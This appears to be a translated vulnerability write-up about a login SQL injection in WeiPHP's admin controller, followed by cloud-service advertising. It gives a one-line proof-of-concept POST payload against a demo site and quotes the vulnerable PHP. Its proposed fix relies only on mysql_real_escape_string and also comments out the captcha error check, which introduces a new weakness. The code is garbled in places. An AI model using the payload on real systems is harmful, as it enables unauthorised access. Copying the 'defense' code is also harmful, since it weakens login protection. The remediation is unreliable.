Catalogue
1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking
1. Vulnerability description
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2016-0190216
2. Vulnerability Trigger Condition
0x1:poc
http://demo.weiphp.cn/index.php?s=/admin/public/login.htmlpost:username[0] =admin'&username[1]=xxx*&password=123
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
/application/admin/controller/publiccontroller.class.php
Publicfunction Login ($username =NULL, $password =NULL, $verify =NULL){ /*read the configuration in the database*/$config= S ('Db_config_data'); if(!$config) {$config= D ('Config'),lists (); S ('Db_config_data', $config); } C ($config); //Add Configuration//Verification Code verification is done here, but if the hacker obtains the verification code dynamically through the HTTP crawl, it can break through this layer of defense if(is_post) {/*Detection Verification Code TODO:*/ ifC'web_site_verify') &&!check_verify ($verify)) { $ This->error ('Verification Code Input Error! '); } /*logged in user*/$User= D ('Common/user'); //No input filtering is performed on $username, $password, resulting in SQL injection if($User->login ($username, $password,'Admin_login')){//logged in user..
5. Defense Methods
/application/admin/controller/publiccontroller.class.php
Publicfunction Login ($username =NULL, $password =NULL, $verify =NULL){ /*read the configuration in the database*/$config= S ('Db_config_data'); if(!$config) {$config= D ('Config'),lists (); S ('Db_config_data', $config); } C ($config); //Add Configuration if(is_post) { /*Detection Verification Code TODO:*/ ifC'web_site_verify') &&!check_verify ($verify)) { //$this->error (' Verification code input Error! '); } /*logged in user*/$User= D ('Common/user'); / * SQL inject Protect * /$username=mysql_real_escape_string ($username); $password=mysql_real_escape_string ($password); /**/ if($User->login ($username, $password,'Admin_login')){//logged in user
6. Defensive Thinking
Copyright (c) Littlehann All rights reserved
weiphp/application/admin/controller/publiccontroller.class.php Login SQL injection Vul
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
